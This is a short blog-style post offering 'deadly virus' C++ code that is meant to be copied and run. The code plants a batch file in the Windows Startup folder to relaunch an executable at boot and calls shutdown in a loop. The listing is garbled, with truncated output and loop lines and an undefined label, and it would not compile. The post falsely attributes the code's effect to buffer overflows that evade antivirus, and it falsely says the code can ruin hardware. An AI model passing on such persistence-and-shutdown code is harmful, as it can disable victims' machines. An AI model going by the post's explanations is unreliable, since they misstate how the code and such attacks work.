How to Create a Deadly Virus for Computers ?

Computer Virus Illustration
WARNING: This is only for Educational Purpose, I’m not responsible for any losses or damages.
Helloooooo, Geeks so according to title says we are today going to create a Deadly Virus for the computer system, so what are we wainting for let’s dive into it. WAIT WAIT WAIT … before getting started let me tell you how dangerous the virus it can be ?.
1. It can curroupt your hard disk
2. It can leave you system unusable (until complete replacement of parts) (Dangerous as it can be)
3. Nothing, left to do with system.
Soo, this is what it can do, so again I’m not responsible for any losses and damages.

I’ll provide you with the actual virus code, just copy the code and run it on system.
(Not Recomonded as it can break everything, this is just for educational purpose, and research purspose and to test what the code can go for it limits.)

  // The Deadly Virus
  using namespace std;
  int main()
  { keybd_event(VK_MENU,0x38,0,0);
  HANDLE outToScreen;
  outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
  char buffer[255];
  char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
  ifstream input(inputFile);
  if (!input)
  ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
  fp << "@ECHO OFF \n";
  fp << "START C:\\rawr.exe \n";
  fp << "EXIT";
  while (!input.eof())
  char buffer[255];
  char inputFile[]="C:\\rawr.exe";
  ifstream input(inputFile);
  if (!input)
  ofstream fp("CLICK.bat", ios::app);
  fp << "@ECHO OFF \n";
  fp << "COPY matrix.exe C:\\rawr.exe \n";
  fp << "START C:\\rawr.exe \n";
  fp << "EXIT";
  system("START CLICK.bat");
  while (!input.eof())
  system("call shutdown.exe -S");
  goto START;
  for(int i = 0; i <>
  int num = (rand() % 10);
  SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  cout <<>
  for ( int j = 0; j <>
  SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
  int number = (rand() % 24);
  cout <<>
  goto START;

So, How does it works ?
After exectuing the code it tries to fill the buffer registers (Also know as buffer overflows) as the buffer overflow techniques doesn’t have enaything to deal with AV (AntiViruses) and Fierwalls so this can be easily bypassed leaving the system complete vulnerable for this Buffer Overflow Attacks.
**So, thats it for today, Happy Programming :) **

#programming #coding #hacking #ethicalhacking

2.45 GEEK